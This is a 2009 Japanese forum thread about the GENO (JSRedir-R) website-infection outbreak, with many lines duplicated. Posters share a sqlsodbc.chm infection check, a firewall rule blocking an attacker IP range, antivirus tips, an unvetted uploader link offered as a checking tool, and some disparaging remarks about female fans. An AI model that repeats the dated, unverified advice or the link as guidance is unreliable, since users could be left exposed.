FWはセキュリティソフトとはまた違うのでは
FC2は前から一部のサイトが改ざんされてるウンタラカンタラって運営の方から
告知はあったから
この際大々的にやってるのかもしれないと信じたい
告知はあったから
この際大々的にやってるのかもしれないと信じたい
>>115
だけど女に知識が乏しい人が多いのも事実なわけで
携帯からざっと見たけど注意喚起してるとこも話題に出すとこも
あまりにも少ない
むしろ平常どおりにしてるとこなんてザラだった
サーチ管理人にもメール出したけど反応ない
だけど女に知識が乏しい人が多いのも事実なわけで
携帯からざっと見たけど注意喚起してるとこも話題に出すとこも
あまりにも少ない
むしろ平常どおりにしてるとこなんてザラだった
サーチ管理人にもメール出したけど反応ない
スキャンは寝てる間とか会社に行ってる間にすればいいだろ
>>105
即レスありがとうございます
一応火狐でジャバスクは切り、最低限の対策はしたのですが
制限つきサイトにも入れておいたらまた何か違うのだろうかと思ったもので。
やっぱりジャバスク切ってソース確認が一番の回避法なのでしょうか
即レスありがとうございます
一応火狐でジャバスクは切り、最低限の対策はしたのですが
制限つきサイトにも入れておいたらまた何か違うのだろうかと思ったもので。
やっぱりジャバスク切ってソース確認が一番の回避法なのでしょうか
124 :GENO:2009/05/17(日) 00:08:56 ID:RKe2VDEW0
>>3まとめサイトの管理者様へ
FWのIP遮断の設定方法について
今現在Norton Internet Security(ver.16.5.0.135)の設定方法のみが掲載されているようですが
旧バージョン使用者のために
ついさっきまであった、ノートン2008での設定方法も併記しておいてもらえると助かります。
FWのIP遮断の設定方法について
今現在Norton Internet Security(ver.16.5.0.135)の設定方法のみが掲載されているようですが
旧バージョン使用者のために
ついさっきまであった、ノートン2008での設定方法も併記しておいてもらえると助かります。
125 :GENO:2009/05/17(日) 00:09:15 ID:LoBLoCup0
今更だけどさ…前スレ935は火狐をDLしたいんじゃないの?
なんかFlash最新版の話になっててスッキリしなかったんだけど
なんかFlash最新版の話になっててスッキリしなかったんだけど
>>69
インターネットのセキュリティ下げたら出来たわ
adobeのサイトは信頼済みサイトに放り込んでたからそっちだけ下げれば良いと思ってた
こんな形式でしかアップデート出来ないのはマジで勘弁して欲しい
インターネットのセキュリティ下げたら出来たわ
adobeのサイトは信頼済みサイトに放り込んでたからそっちだけ下げれば良いと思ってた
こんな形式でしかアップデート出来ないのはマジで勘弁して欲しい
感染サイトが閉鎖されていない時点で
GENOサイトをもう悪くいえないな
GENOサイトをもう悪くいえないな
女向け同人は確かにこういうの面と向かって注意しにくい雰囲気あるよな。
ネトゲでウィルス流行したときとかは、
感染して放置の掲示板とかブログはURL(リンクしないように置き換えして)張られてたが
「個人のサイトは晒しになるからだめー」とかそういうノリだもん。未だに。
ネトゲでウィルス流行したときとかは、
感染して放置の掲示板とかブログはURL(リンクしないように置き換えして)張られてたが
「個人のサイトは晒しになるからだめー」とかそういうノリだもん。未だに。
>>121
はいはい男女板でもいこうねー
はいはい男女板でもいこうねー
>>108
インストール開始時も完了時もウィンドウ出ないから気づいてないだけじゃないか?
完了したらFLASH流れる
あと開始前にブラウザの黄色いバー押せって書いてあったけど
製品によっては出ないみたいで自分は出なかった
紛らわしい製品もあるし、偽物もあるから気をつけてな
インストール開始時も完了時もウィンドウ出ないから気づいてないだけじゃないか?
完了したらFLASH流れる
あと開始前にブラウザの黄色いバー押せって書いてあったけど
製品によっては出ないみたいで自分は出なかった
紛らわしい製品もあるし、偽物もあるから気をつけてな
>>106
カスペ重要の方でスキャンしたけど、それでも2時間かかったw
完全の方が安心できると思うけど、重要でもsystem32をスキャンしてたからいいんじゃね?
よくわかんないけど
ぐぐったけどそれらしいのが出てこなかったんで教えてください
Java Scriptを切ったんだけど、特定のサイトのみ有効にするって事は出来ない?
JS切ったら常駐スレをread.htmlで見れなくなったからさ
カスペ重要の方でスキャンしたけど、それでも2時間かかったw
完全の方が安心できると思うけど、重要でもsystem32をスキャンしてたからいいんじゃね?
よくわかんないけど
ぐぐったけどそれらしいのが出てこなかったんで教えてください
Java Scriptを切ったんだけど、特定のサイトのみ有効にするって事は出来ない?
JS切ったら常駐スレをread.htmlで見れなくなったからさ
133 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:11:20 ID:1i8ArUeO0
一気にセキュリティの認識たかまったな。
136 :GENO:2009/05/17(日) 00:11:52 ID:9u3fpjKy0
>>121
確かに、自分が再三注意をあげてたら友人がミクシで記事かいてくれたんだが
今のところレスは付いていない様子。同人での交流が盛んだしなんらかの反応があることを期待してたんだがなあ
危機感がないというか、対策ソフト入れてりゃ大丈夫だろー程度の認識の人は多いと思う
確かに、自分が再三注意をあげてたら友人がミクシで記事かいてくれたんだが
今のところレスは付いていない様子。同人での交流が盛んだしなんらかの反応があることを期待してたんだがなあ
危機感がないというか、対策ソフト入れてりゃ大丈夫だろー程度の認識の人は多いと思う
fc2繋がった。
ほんとビックリするぜ、もう・・・
ほんとビックリするぜ、もう・・・
138 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:12:10 ID:63JTLjJQ0
139 :GENO:2009/05/17(日) 00:12:23 ID:o+iDNMbs0
ウイルスセキュリティZEROを使用中なんだが、こいつでGENOを防げる気がしない
ZERO使用中なのにavastインストールするのはまずいのかな
ZERO使用中なのにavastインストールするのはまずいのかな
自サイトにwiki貼って注意喚起したら
火狐で見てる人がグっと増えたな
辺境サイトでも一応効果はあるみたいでヨカタ
火狐で見てる人がグっと増えたな
辺境サイトでも一応効果はあるみたいでヨカタ
FC2戻った。
ほっ
ほっ
ふうむ。
まあオフ版をダウソするかな……
まあオフ版をダウソするかな……
カスペノオンラインスキャンしようとしたら何回やっても
アップデートに失敗しましたってのが出て進めない、
どうすれば解消するんでしょうか
アップデートに失敗しましたってのが出て進めない、
どうすれば解消するんでしょうか
149 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:14:15 ID:+Ile/hUn0
ノートンじゃ反応しないけど
カスペ先生だと真っ赤orz
ただcmd.exe、regedit.exeも立ち上がるんだよな
どういうこっちゃ
カスペ先生だと真っ赤orz
ただcmd.exe、regedit.exeも立ち上がるんだよな
どういうこっちゃ
>132
Firefox+NoScriptでストップをかけているなら「一時的に許可」できますが
騒動が落ち着くまで常駐スレを専ブラで見ようとは思わないのですか?
Firefox+NoScriptでストップをかけているなら「一時的に許可」できますが
騒動が落ち着くまで常駐スレを専ブラで見ようとは思わないのですか?
まとめサイトにあるウイルス対策ソフトじゃなきゃ
解決できんのか?
解決できんのか?
FC2で作成したサイトは普通に立ち上がるし、23鯖ブログも立ち上がりました。
どこも時間差があるだけの一時的なものだと思います。
どこも時間差があるだけの一時的なものだと思います。
153 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:14:45 ID:RBgr+byX0
154 :GENO:2009/05/17(日) 00:15:04 ID:YMu+9f/FO
>>121
通報者への返信よりも対策を優先させてもらって、落ち着いてからお礼の連絡したりするけど…どうなんだろうね?
管理用メールを携帯に転送させてる人じゃないと、気付くの遅いかも
FC2繋がるとこもあるんだね
通報者への返信よりも対策を優先させてもらって、落ち着いてからお礼の連絡したりするけど…どうなんだろうね?
管理用メールを携帯に転送させてる人じゃないと、気付くの遅いかも
FC2繋がるとこもあるんだね
あんまり男管理人に夢見ない方がいいよ…男性向けジャンルだからこそ思うw
>>149
テンプレ見ておかしいところ無ければ兵器じゃね?
テンプレ見ておかしいところ無ければ兵器じゃね?
認識甘いのは腐女子に限った話でもないと思うが
前スレでも誰か言ってたけど、
同人界は個人サイトの観覧者の大部分が
サイト管理者でもあるという特徴があるからなあ
いちどジャンル内にウイルスが持ち込まれたら
広がり方が半端ない
前スレでも誰か言ってたけど、
同人界は個人サイトの観覧者の大部分が
サイト管理者でもあるという特徴があるからなあ
いちどジャンル内にウイルスが持ち込まれたら
広がり方が半端ない
>>149
亜種だからさっさとクリーンインストしろ
亜種だからさっさとクリーンインストしろ
159 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:15:38 ID:8/IcS20M0
同人界隈の大手は、ページの更新早いから感染も早けりゃ対策も早いから
良いような悪いような・・・・
良いような悪いような・・・・
ttp://www1.axfc.net/uploader/Sc/so/1953
sqlsodbc.chmのMD5確認してくれるソフトみたい
sqlsodbc.chmのMD5確認してくれるソフトみたい
>>160
そんなあやしげなもんDLできない
そんなあやしげなもんDLできない
>>160
こええよ
こええよ
164 :GENO:2009/05/17(日) 00:16:57 ID:Ee2VdHkT0
お、自分のところもFC2復帰したよ
ウイルスは関係ないのかな
ウイルスは関係ないのかな
165 :geno:2009/05/17(日) 00:17:04 ID:SK1PylRj0
どうもNorton 360じゃIP指定遮断ってできない?
カスペがデータベース更新のところでエラー停止するんだけど何で…
JAVAアプレット開始に失敗しました!って出るときと出ない時とあるんだけど
同じ人いるかなぁ
ニフティでは一応シロだったけど
avastアンチウィルスチェストに入ってきたkernel32.dllの最終更新が3月21日なのが
偶然にしては気持ち悪い(ウィルスなしと出てる)
ヘルプファイルの改ざん更新日も3/21だったよね?
JAVAアプレット開始に失敗しました!って出るときと出ない時とあるんだけど
同じ人いるかなぁ
ニフティでは一応シロだったけど
avastアンチウィルスチェストに入ってきたkernel32.dllの最終更新が3月21日なのが
偶然にしては気持ち悪い(ウィルスなしと出てる)
ヘルプファイルの改ざん更新日も3/21だったよね?
一応cmd.exe、regedit.exe両方とも立ち上がるし、
ニフティのオンラインスキャンの「推奨」でウイルスは発見されなかったんだけど、
カスペのオフ版でフルスキャンしたほうがいい?
ニフティのオンラインスキャンの「推奨」でウイルスは発見されなかったんだけど、
カスペのオフ版でフルスキャンしたほうがいい?
ただ火狐使えば安心と思っちゃってる奴増えてんなー
普通に感染対象なのに
普通に感染対象なのに
携帯のフルブラウザで見てるんで、感染した可能性があるんだけど、どうしたら良いの?
とりあえず感染してないのを確認したら何もせずに寝るのが一番良いんでねーの?
173 :GENO:2009/05/17(日) 00:18:50 ID:mXU46OMrO
頼むから>>118に答えてくれ
心配だ
心配だ
質問です
Windows Meの場合、C:\WINDOWS\system32\sqlsodbc.chmは元からあるものでしょうか?
ちなみに検索かけたらありませんでした
Windows Meの場合、C:\WINDOWS\system32\sqlsodbc.chmは元からあるものでしょうか?
ちなみに検索かけたらありませんでした
175 : ◆Tcp44q2AKA :2009/05/17(日) 00:19:33 ID:DmjTuH3G0
Pixivが異様に重いんだが
俺だけか?
俺だけか?
176 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:19:54 ID:RBgr+byX0
>>169
それでなくても火狐ってまんま使ってると危ないしな
それでなくても火狐ってまんま使ってると危ないしな
177 :GENO:2009/05/17(日) 00:19:56 ID:OoqNXy6Z0
自分もカスペノオンラインスキャンしようとしたら何回やっても
アップデートに失敗しましたってのが出る
javaScript切ったりはしてない。なんでだ。
アップデートに失敗しましたってのが出る
javaScript切ったりはしてない。なんでだ。
>>172
あるいは無関係の別のウイルスかも知れん
あるいは無関係の別のウイルスかも知れん
182 :GENO:2009/05/17(日) 00:20:16 ID:/3OwKYN30
>>175
ランカータイム、土曜日だぞ。
ランカータイム、土曜日だぞ。
183 :sage:2009/05/17(日) 00:20:19 ID:vQxQiZOp0
>>175
今対応中だってさ
今対応中だってさ
>>175
ウィルス関係なくこの時間は重いと思う
ウィルス関係なくこの時間は重いと思う
ウィルスの情報とかwikiは拡散するべき?
>>175
pixivっていつも重くね?
pixivっていつも重くね?
189 :GENO:2009/05/17(日) 00:20:55 ID:o+iDNMbs0
>>145
>>147
>>153
ありがとう
分かっちゃいたけどZERO…お前って奴は本当に…
アンインストとなると色々あって夕方以降になるし、重複しても平気なんだったらavastインストしとこうかな
>>147
>>153
ありがとう
分かっちゃいたけどZERO…お前って奴は本当に…
アンインストとなると色々あって夕方以降になるし、重複しても平気なんだったらavastインストしとこうかな
もしかしたら明日の大阪のイベントの方でてんぱってたり
早寝してたりするのかもしれない>腐女子
実際専スレにここのスレ貼られても「豚のほうが心配」とか言ってたバカがいた
ネット?なくても生きていけるしwwwて感じなんだろうなあ
感染して痛い目にあえばいいと思えてきた
早寝してたりするのかもしれない>腐女子
実際専スレにここのスレ貼られても「豚のほうが心配」とか言ってたバカがいた
ネット?なくても生きていけるしwwwて感じなんだろうなあ
感染して痛い目にあえばいいと思えてきた
fc2復帰したな
たびたび出てるけど携帯ってどうなんだろうな
フルブラウザだと感染するのか?
FTP使ってないからサイトのパスは大丈夫だとしても携帯のネットバンクとかあるよな
たびたび出てるけど携帯ってどうなんだろうな
フルブラウザだと感染するのか?
FTP使ってないからサイトのパスは大丈夫だとしても携帯のネットバンクとかあるよな
>>174
セキュリティ板の方で聞いた方がよくないか
セキュリティ板の方で聞いた方がよくないか
>167
完全スキャン推奨
あと完全スキャン→全般で「すべてのファイルをスキャン」にしろよ。
ファイル形式によるスキャン・拡張子によるスキャンは亜種を取りこぼす危険性がある
自ジャンルはだめだ…注意喚起するブログはいくつか出ているけど、大半の管理人・
閲覧者とも明日のイベントに意識が向いてしまってWebサイト感染をメールフォームで
報告してもスルーされてる。
完全スキャン推奨
あと完全スキャン→全般で「すべてのファイルをスキャン」にしろよ。
ファイル形式によるスキャン・拡張子によるスキャンは亜種を取りこぼす危険性がある
自ジャンルはだめだ…注意喚起するブログはいくつか出ているけど、大半の管理人・
閲覧者とも明日のイベントに意識が向いてしまってWebサイト感染をメールフォームで
報告してもスルーされてる。
197 :GENO:2009/05/17(日) 00:22:13 ID:R4Q5u5lq0
何度かIEの強制終了があった上、昨日バスターが強制終了されて
青くなってたんだが、バスターでの検索・sqlsodbc.chm・cmd.exe・regedit.exeの
チェックしたらセーフだった
しかしこないだから、動画サイトとかフラッシュプレーヤー使ったサイトが
見られない…最新バージョンダウンロードしても駄目だし…
青くなってたんだが、バスターでの検索・sqlsodbc.chm・cmd.exe・regedit.exeの
チェックしたらセーフだった
しかしこないだから、動画サイトとかフラッシュプレーヤー使ったサイトが
見られない…最新バージョンダウンロードしても駄目だし…
>>190
豚の方が心配なのは仕方ないんじゃ
豚の方が心配なのは仕方ないんじゃ
自分の環境だとカスペはインターフェイス変わってから
「JAVAアプレット開始に失敗しました!」って必ず出る様になった
もう数ヶ月前からずっとこれだから諦めて、今はニフのオンラインスキャンしてるよ
「JAVAアプレット開始に失敗しました!」って必ず出る様になった
もう数ヶ月前からずっとこれだから諦めて、今はニフのオンラインスキャンしてるよ
>>190
……当たり前じゃね?
……当たり前じゃね?
201 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:23:26 ID:QIT02HZwP
203 : ◆Tcp44q2AKA :2009/05/17(日) 00:23:39 ID:DmjTuH3G0
質問・雑談スレ290@運用情報板
http://qb5.2ch.net/test/read.cgi/operate/1241939123/
439 名前:root▲▲ ★[] 投稿日:2009/05/14(木) 21:57:26 ID:???0 ?DIA(102226)
まほらさんは、ここを読んでおられると思いますので、
ご注意いただけると思います。
maido3.cc の Web にあった注意内容:
【目視で確認する方法】
※Windows XP をご利用の方のみ
・sqlsodbc.chm の確認
ウィルスに感染した場合、C:\WINDOWS\system32\sqlsodbc.chm が上書きされます。
ご利用のパソコンの sqlsodbc.chm を確認してください。
今 Google さんに聞いてみて出てきたリンク:
sqlsodbc.chmの改変を継続的にチェックする方法: 高機能サロン管理システム★さまれぼ!★開発日記
http://excomp.cocolog-nifty.com/blog/2009/05/sqlsodbcchm-724.html
http://qb5.2ch.net/test/read.cgi/operate/1241939123/
439 名前:root▲▲ ★[] 投稿日:2009/05/14(木) 21:57:26 ID:???0 ?DIA(102226)
まほらさんは、ここを読んでおられると思いますので、
ご注意いただけると思います。
maido3.cc の Web にあった注意内容:
【目視で確認する方法】
※Windows XP をご利用の方のみ
・sqlsodbc.chm の確認
ウィルスに感染した場合、C:\WINDOWS\system32\sqlsodbc.chm が上書きされます。
ご利用のパソコンの sqlsodbc.chm を確認してください。
今 Google さんに聞いてみて出てきたリンク:
sqlsodbc.chmの改変を継続的にチェックする方法: 高機能サロン管理システム★さまれぼ!★開発日記
http://excomp.cocolog-nifty.com/blog/2009/05/sqlsodbcchm-724.html
>>196
ありがとう、ちょっとやってきます
ありがとう、ちょっとやってきます
210 :geno:2009/05/17(日) 00:25:54 ID:Il+SPzcZO
>>204
IDがボリューブ。惜しいな
IDがボリューブ。惜しいな
>190
ボカロも似たような状態なわけだが
イベントのが大事
ボカロも似たような状態なわけだが
イベントのが大事
結局ウイルスソフトはウイルスバスターが一番いいの?
豚の方が心配をバカって言うのはどうなのよ
近所に住んでるから怖いよそっちも
家にいても外出ても落ち着かねー
近所に住んでるから怖いよそっちも
家にいても外出ても落ち着かねー
>pixivが重い。。
>1分未満前 webで
pixiv運営のダイイングメッセージかこれ?
>1分未満前 webで
pixiv運営のダイイングメッセージかこれ?
他所覗いてきたが
「〜が感染すれば面白いな」とか「〜厨のせいで」
とかの発言に狂気を感じるわ
「〜が感染すれば面白いな」とか「〜厨のせいで」
とかの発言に狂気を感じるわ
ウイルス?そんなんよりイベントのが大事!
とか言ってる人に限って感染してると
何で早く教えてくれなかったんだ!と切れるっていうね…
とか言ってる人に限って感染してると
何で早く教えてくれなかったんだ!と切れるっていうね…
>>214
不覚にも吹いたじゃねーか
不覚にも吹いたじゃねーか
222 :GENO報告:2009/05/17(日) 00:28:15 ID:crTm3bJ70
なんでSP最新版にしなかったんだといわれても、最新版にすると大体危険な不具合がって
後々どっかでニュースになるから様子見してたらそのまま忘れてしまったんだよな
まぁ感染してなかったから大人しくしてるけど
後々どっかでニュースになるから様子見してたらそのまま忘れてしまったんだよな
まぁ感染してなかったから大人しくしてるけど
224 :GENO:2009/05/17(日) 00:28:19 ID:k/dYf2fw0
>>3
●NortonInternetSecurity2008の設定方法
「個別」 95.129.145.58
は
「範囲」 95.129.144.0-95.129.145.255
内に含まれるアドレスです。
まあ書かれている順番でアドレスを打ち込んでいけば
ノートン先生が注意してくれるので設定自体は混乱しないと思いますが
念のためアドレス情報の再確認をした方がいいかも。
●NortonInternetSecurity2008の設定方法
「個別」 95.129.145.58
は
「範囲」 95.129.144.0-95.129.145.255
内に含まれるアドレスです。
まあ書かれている順番でアドレスを打ち込んでいけば
ノートン先生が注意してくれるので設定自体は混乱しないと思いますが
念のためアドレス情報の再確認をした方がいいかも。
>198、200
まあそれはそうなんだけどさ
今のまま、何もしない状態で新刊情報とかチェックしにサイト巡りしたら
知らないうちに短時間でオンラインパンデミック、なんてことになりかねない
自衛はしといてほしいじゃん…知ってるならさ
まあそれはそうなんだけどさ
今のまま、何もしない状態で新刊情報とかチェックしにサイト巡りしたら
知らないうちに短時間でオンラインパンデミック、なんてことになりかねない
自衛はしといてほしいじゃん…知ってるならさ
赤豚と豚インフルが混じってるぞおまいら
http://itpro.nikkeibp.co.jp/article/COLUMN/20060131/228217/
こいつで確認することもできそうだな
こいつで確認することもできそうだな
豚の方が心配なのは仕方ないなw
実際問題、PCがなくても人は生きてはいけるが
耐性のないリアルウイルスだと生死に関わるからな…
実際問題、PCがなくても人は生きてはいけるが
耐性のないリアルウイルスだと生死に関わるからな…
>>227
リンク先がなんなのか位書いてくれ
リンク先がなんなのか位書いてくれ
オンラインで原稿作ってる人はPC逝ったらやばいんじゃないの
今pixiv繋がる人いる?
>>202
ちょっとここみてきな
http://www.av-test.org/
http://antivirus-news.net/2009/04/avtest4g-data18.html
要はカスペだけ信用すんなってことなんだけどね
ちょっとここみてきな
http://www.av-test.org/
http://antivirus-news.net/2009/04/avtest4g-data18.html
要はカスペだけ信用すんなってことなんだけどね
>>226
やっぱりかw 自分もそこ気になってた
やっぱりかw 自分もそこ気になってた
豚って赤豚のことじゃないの?
ウィルスが流行るといつもこうだが、怖くてリンクがクリック出来なくなるな
皆さんお疲れ様です
感染報告ありの女性向け個人サイト餅の対処として、(Winでxp、詳しい知識ない)
pcの感染はないか確認
flashとかアップロード
IEはjs無効にする
サイトのhtml記述を確認
ffftpはソフトごと削除
用心に拍手(公式を借りてる)とサーチとブログ(fc2)へのリンクは切ってウィルス注意と出してきた
これでもう一度感染チェックして暫くpcごと開かなかったら、(ネットワーク遮断で利用する)
自衛とゾンビサイト化は防げるでFAと思っていい?
勿論、毎日このスレはROMする
感染報告ありの女性向け個人サイト餅の対処として、(Winでxp、詳しい知識ない)
pcの感染はないか確認
flashとかアップロード
IEはjs無効にする
サイトのhtml記述を確認
ffftpはソフトごと削除
用心に拍手(公式を借りてる)とサーチとブログ(fc2)へのリンクは切ってウィルス注意と出してきた
これでもう一度感染チェックして暫くpcごと開かなかったら、(ネットワーク遮断で利用する)
自衛とゾンビサイト化は防げるでFAと思っていい?
勿論、毎日このスレはROMする
カスペのスキャンってオンラインスキャンよりトライアル版落としてやった方がいいの?
初歩的な事ですまん。
初歩的な事ですまん。
まとめサイトのIP遮断方法はノートンのだけしか載ってないのか
242 :geno:2009/05/17(日) 00:31:41 ID:/3OwKYN30
>>232
つながんね。今回はいつにもましてヒドイな…
つながんね。今回はいつにもましてヒドイな…
243 :GENO:2009/05/17(日) 00:31:52 ID:KLZpyR49O
youtube見れない
前スレとか見てきたけど、携帯は例えフルブラウザで見ても
OSの問題で結局感染しないってことでおkですか?
だとすると、wiki注意書きの「携帯閲覧は平気?」の項目の書き方は
誤解を招く恐れがあるので書き換えた方が良いのではないでしょうか。
OSの問題で結局感染しないってことでおkですか?
だとすると、wiki注意書きの「携帯閲覧は平気?」の項目の書き方は
誤解を招く恐れがあるので書き換えた方が良いのではないでしょうか。
>>204
よかったなwww
よかったなwww
247 :GENO:2009/05/17(日) 00:32:29 ID:8yHdaheX0
>>239
全然ダメ
全然ダメ
248 :げの:2009/05/17(日) 00:32:33 ID:YMu+9f/FO
かぺるオンラインのデータベース重いなあ
やっぱアクセス殺到してるんだろうか
やっぱアクセス殺到してるんだろうか
>>190の言ってる中の豚とは豚インフルじゃなくて
赤/ブ/ー/ブ/ー主催、通称赤豚っていうイベントのことだよ
赤/ブ/ー/ブ/ー主催、通称赤豚っていうイベントのことだよ
250 :GENO:2009/05/17(日) 00:32:43 ID:Ee2VdHkT0
赤豚というイベントの方が大事な人
赤豚というイベントに行って豚インフルにかからないか不安な人
がいるってことだろ
赤豚というイベントに行って豚インフルにかからないか不安な人
がいるってことだろ
ニフティオンラインスキャンでやってみたら
1つ感染してたんだけどJANEの借金生活板の過去ログで
Exploit.HTML.Mhtつうウイルスだった
1つ感染してたんだけどJANEの借金生活板の過去ログで
Exploit.HTML.Mhtつうウイルスだった
252 :GENO:2009/05/17(日) 00:32:50 ID:owV3p7qMO
身内の隠蔽体質、知識不足、自己保身、陰湿さ
こりゃ被害拡大は免れないかも
801系は中国のような腐海だからなぁ、女の悪いところ全部が最悪の方向で出てるな
こりゃ被害拡大は免れないかも
801系は中国のような腐海だからなぁ、女の悪いところ全部が最悪の方向で出てるな
pixivとfc2は鯖側で404だと思う
256 :GENO:2009/05/17(日) 00:33:20 ID:F89TTXiT0
>241
ノートンしか持ってないから情報落とせないんだ
他ソフト持ちの情報が落とされるといいんだけど
ノートンしか持ってないから情報落とせないんだ
他ソフト持ちの情報が落とされるといいんだけど
257 :GENO:2009/05/17(日) 00:33:25 ID:G0Y+AEiE0
インテ行く人はリアルウィルスにも気をつけとけよ
【人情パンデミック】大阪で高校生8人が新たに陽性反応
http://tsushima.2ch.net/test/read.cgi/news/1242484839/
【阪デミック】 大阪の女子高生陽性→集団感染の疑い。現在100人が症状訴え。実は前から兆候が…2
http://tsushima.2ch.net/test/read.cgi/news/1242486964/
【人情パンデミック】大阪で高校生8人が新たに陽性反応
http://tsushima.2ch.net/test/read.cgi/news/1242484839/
【阪デミック】 大阪の女子高生陽性→集団感染の疑い。現在100人が症状訴え。実は前から兆候が…2
http://tsushima.2ch.net/test/read.cgi/news/1242486964/
258 :GENO:2009/05/17(日) 00:33:32 ID:lOQh6FbQ0
>>230
簡易バックアッププログラム
簡易バックアッププログラム
ここぞとばかりに腐女子叩くバカは他でやってくれ
ε ⌒ヘ⌒ヽフ
( ( ・ω・)
_...。゚しー し─J
⊂...__....⊃ ジョロジョロ〜
( ( ・ω・)
_...。゚しー し─J
⊂...__....⊃ ジョロジョロ〜
263 :geno:2009/05/17(日) 00:34:25 ID:htzc9FVB0
ノートン先生お休みしすぎだろ
264 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:34:29 ID:ezzT6TFe0
どうも自サイトに見慣れないソースがありまして…Mac者なので今の所PCは
問題なさげなんですが、この場合、サイトを削除して再度ウプすれば問題
ないのでしょうか?無知ですみません…
問題なさげなんですが、この場合、サイトを削除して再度ウプすれば問題
ないのでしょうか?無知ですみません…
>>179について意見求む
とりあえずトップページ1行目を
>現在新種のコンピュータウイルス「JSRedir-R」(通称GENOウイルス)が急速に拡大中です。
に変えればいいんじゃないかと思ってますが。
正式名出た以上通称でも文句言われたりするんだろうか。
サイト名とかは現行でいいすか?通称つけたほうがいい?JSRedir-Rに変える?
>>222追加しました
>>224ごめんどう手を加えたらいいのかワカンネ
修正箇所と修正内容レスしてくれたら書き換えるよ
(235まで確認)
とりあえずトップページ1行目を
>現在新種のコンピュータウイルス「JSRedir-R」(通称GENOウイルス)が急速に拡大中です。
に変えればいいんじゃないかと思ってますが。
正式名出た以上通称でも文句言われたりするんだろうか。
サイト名とかは現行でいいすか?通称つけたほうがいい?JSRedir-Rに変える?
>>222追加しました
>>224ごめんどう手を加えたらいいのかワカンネ
修正箇所と修正内容レスしてくれたら書き換えるよ
(235まで確認)
268 :GENO:2009/05/17(日) 00:35:07 ID:oqwjvISdP
巨大ボットネット発見,190万台の感染マシンで構成
http://itpro.nikkeibp.co.jp/article/NEWS/20090423/329035/
http://www.itmedia.co.jp/news/articles/0905/15/news032.html
>Sophosの最新報告書によればマルウェア感染ページは4.5秒に1件のペースで増加。
>2007年に比べて3倍のペースで増え続けている。
世界中で話題になってるみたいだね
http://itpro.nikkeibp.co.jp/article/NEWS/20090423/329035/
http://www.itmedia.co.jp/news/articles/0905/15/news032.html
>Sophosの最新報告書によればマルウェア感染ページは4.5秒に1件のペースで増加。
>2007年に比べて3倍のペースで増え続けている。
世界中で話題になってるみたいだね
269 :GENO:2009/05/17(日) 00:35:35 ID:Ee2VdHkT0
>>265
いいからスレ最初から読んでくれ
いいからスレ最初から読んでくれ
自己保身もいい方向に働けばいいんだけどね
せめて自分だけは潔白でいたいとか
他板でもウイルス?よくワカンネってレスも見る
今北産業みたいなのもあった方がわかりやすいかも
せめて自分だけは潔白でいたいとか
他板でもウイルス?よくワカンネってレスも見る
今北産業みたいなのもあった方がわかりやすいかも
272 :GENO:2009/05/17(日) 00:36:11 ID:qhpSIwHs0
IP遮断方法ってそれぞれのセキュリティソフトのサイトに書いてないの?
豚をイベントのほうだと思ったのは書き込んだ人じゃなくて読んだあなたの思い込みではないの?
275 :GENO:2009/05/17(日) 00:37:01 ID:OukNUfSz0
カスペスキャンしたら数年前の専ブラのログの書き込みに反応した
…それはノートントラップだ…
昨日だけで4回はスキャンしたな…疲れた…
…それはノートントラップだ…
昨日だけで4回はスキャンしたな…疲れた…
276 :名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 00:37:02 ID:v+HFL7dV0
まとめサイト繋がる? なんか表示が不安定なんだけど
ただ重いだけならいいけどまた何かあったんじゃないかと心配
ただ重いだけならいいけどまた何かあったんじゃないかと心配
278 :GD:2009/05/17(日) 00:37:18 ID:ueGxpPuI0
Remote Registryサービスを止めるってのは対抗策にならない?
どちらにしろ同じもんじゃないか?
赤豚イベント開催場所=豚フル発生地帯なんだから
赤豚イベント開催場所=豚フル発生地帯なんだから
腐叩きしてんのは
東方厨だから気にするな
東方厨だから気にするな
pixiv復活
ノートン先生切ってカスペオンラインに挑んだけどやっぱり
エラーがでる('A`)
そして毎回「連続投稿ですか?」って出るの何とかならないのかな
エラーがでる('A`)
そして毎回「連続投稿ですか?」って出るの何とかならないのかな
自分のパソコンが感染してないのを確認してからサイトは一切いじってない
注意喚起もせず自己中で薄情かもしれんが、亜種のことを聞くと二次被害出しそうで怖いんだよ
注意喚起もせず自己中で薄情かもしれんが、亜種のことを聞くと二次被害出しそうで怖いんだよ
>>274
1:たまたまBuffalo使いがいない
2:みんな分かってた
3:ありがたいと思ったけど報告してない
4:ようわからん
5:NTT製となっているルータにBuffalo製が含まれていることを知らない
1:たまたまBuffalo使いがいない
2:みんな分かってた
3:ありがたいと思ったけど報告してない
4:ようわからん
5:NTT製となっているルータにBuffalo製が含まれていることを知らない
>>3 (>>267)
>>125にも書いたんですが、FTP以外の個人情報についてはまだ不明なのです。
なので以下のように書き換えを提案したいのですが……。
> 感染されたサイトを閲覧した時点でPCが感染、FTPのIDやパスが抜かれる、
> クレジットカード等、ネットを介して利用する個人情報の類いが抜かれる、
> Acrobatが挙動不審になる等の問題を引き起こします。
↓
感染されたサイトを閲覧した時点でPCが感染、FTPのIDやパスが抜かれる、
Acrobatが挙動不審になる等の問題を引き起こすことが確認されています。
また、現状ではまだ確認されていませんが、
通販サイトやウェブメール等、WEBブラウザを介したWEBサービスで利用する
IDやパスワード、クレジットカード情報等の個人情報が抜かれる可能性もあります。
>>125にも書いたんですが、FTP以外の個人情報についてはまだ不明なのです。
なので以下のように書き換えを提案したいのですが……。
> 感染されたサイトを閲覧した時点でPCが感染、FTPのIDやパスが抜かれる、
> クレジットカード等、ネットを介して利用する個人情報の類いが抜かれる、
> Acrobatが挙動不審になる等の問題を引き起こします。
↓
感染されたサイトを閲覧した時点でPCが感染、FTPのIDやパスが抜かれる、
Acrobatが挙動不審になる等の問題を引き起こすことが確認されています。
また、現状ではまだ確認されていませんが、
通販サイトやウェブメール等、WEBブラウザを介したWEBサービスで利用する
IDやパスワード、クレジットカード情報等の個人情報が抜かれる可能性もあります。
感染してないみたいだ。良かった…
サイトには注意書きとwikiへのリンク貼っておいた
これ犯人見つかったらどれくらい罪重いんだろうな
